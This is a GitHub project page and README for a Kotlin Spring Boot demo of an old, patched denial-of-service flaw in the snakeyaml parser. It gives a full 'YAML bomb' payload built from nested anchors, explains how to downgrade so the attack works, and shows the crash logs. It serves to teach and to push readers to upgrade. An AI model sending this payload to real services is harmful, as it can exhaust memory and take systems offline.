https://github.com/leeturner/snakeyaml-dos-vulnerability

An example application to demonstrate the (now outdated) dos vulnerability in snakeyaml as described in this Snyk article - https://snyk.io/blog/java-yaml-parser-with-snakeyaml/
https://github.com/leeturner/snakeyaml-dos-vulnerability

Last synced: 5 days ago
JSON representation

An example application to demonstrate the (now outdated) dos vulnerability in snakeyaml as described in this Snyk article - https://snyk.io/blog/java-yaml-parser-with-snakeyaml/

• Host: GitHub
• URL: https://github.com/leeturner/snakeyaml-dos-vulnerability
• Owner: leeturner
• Created: 2021-09-26T09:23:06.000Z (over 3 years ago)
• Default Branch: main
• Last Pushed: 2023-05-10T13:27:17.000Z (over 1 year ago)
• Last Synced: 2023-05-10T15:00:34.114Z (over 1 year ago)
• Language: Kotlin
• Size: 26.4 KB
• Stars: 1
• Watchers: 2
• Forks: 0
• Open Issues: 3
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# snakeyaml DOS Vulnerability

An example application to demonstrate the (**now outdated**) DOS vulnerability in snakeyaml as described in this Snyk 

article - https://snyk.io/blog/java-yaml-parser-with-snakeyaml/

This project currently uses version `1.32` of snakeyaml which contains the fix for the denial of service attack 

described in the [Snyk Article](https://snyk.io/blog/java-yaml-parser-with-snakeyaml/).  To demonstrate the attack 

described below you will need to update the version to `1.25`:

```xml

    org.yaml

    snakeyaml

    1.25

```

This simple Spring Boot application written in Kotlin uses snakeyaml to parse a YAML payload and convert that payload into a DTO.

Once parsed, the DTO will be output to the console.  A successful YAML payload can be found below:

```yaml

firstname: "Matt"

lastname: "Murdock"

children:

  - firstname: "Jill"

    lastname: "Murdock"

  - firstname: "Bob"

    lastname: "Murdock"

    children:

      - firstname: "Bob Jnr"

        lastname: "Murdock"

```

When the YAML is converted to the `Person` DTO, you should see something similar to this in the console:

```

Person(

    firstname=Matt, 

    lastname=Murdock, 

    children=[

        Person(

            firstname=Jill, 

            lastname=Murdock, 

            children=[]

        ), 

        Person(

            firstname=Bob, 

            lastname=Murdock, 

            children=[

                Person(

                    firstname=Bob Jnr, 

                    lastname=Murdock, 

                    children=[]

                )

            ]

        )

    ]

)

```

The Snyk article describes how you can use anchors in YAML to reuse those anchors, so you don't have to repeat yourself 

(read the article for a more detailed explanation).  The example payload below demonstrates the use of anchors to 

create a *YAML Bomb* effectively replicating the Billion laughs attack described in the article:

```yaml

firstname: "Matt"

lastname: "Murdock"

children:

  - children: &a [{firstname: "Bob"},{lastname: "Smith"}]

  - children: &b [{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a},{children: *a}]

  - children: &c [{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b},{children: *b}]

  - children: &d [{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c},{children: *c}]

  - children: &e [{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d},{children: *d}]

  - children: &f [{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e},{children: *e}]

  - children: &g [{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f},{children: *f}]

  - children: &h [{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g},{children: *g}]

  - children: &i [{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h},{children: *h}]

```

If you make a request to this demo application with a recent version of snakeyaml (version 1.26 or greater) an exception 

will be thrown, but it handles the *YAML Bomb* correctly:

```

2021-10-03 15:12:22.364 ERROR 13053 --- [nio-8080-exec-2] o.a.c.c.C.[.[.[.[dispatcherServlet]      : Servlet.service() for servlet [dispatcherServlet] in context with path [/snakeyaml-dos] threw exception [Request processing failed; nested exception is org.yaml.snakeyaml.error.YAMLException: Number of aliases for non-scalar nodes exceeds the specified max=50] with root cause

```

With version 1.25 or lower of snakeyaml, it attempts to parse all the anchors resulting in 

a `java.lang.OutOfMemoryError` being thrown:

```

2021-10-03 15:05:30.019 ERROR 12868 --- [nio-8080-exec-4] o.a.c.c.C.[.[.[.[dispatcherServlet]      : Servlet.service() for servlet [dispatcherServlet] in context with path [/snakeyaml-dos] threw exception [Handler dispatch failed; nested exception is java.lang.OutOfMemoryError: Java heap space] with root cause

```

If you are using version 1.25 or lower of snakeyaml then you should look to upgrade to 1.26 or higher.

## References

* https://snyk.io/blog/java-yaml-parser-with-snakeyaml/

* https://snyk.io/vuln/SNYK-JAVA-ORGYAML-537645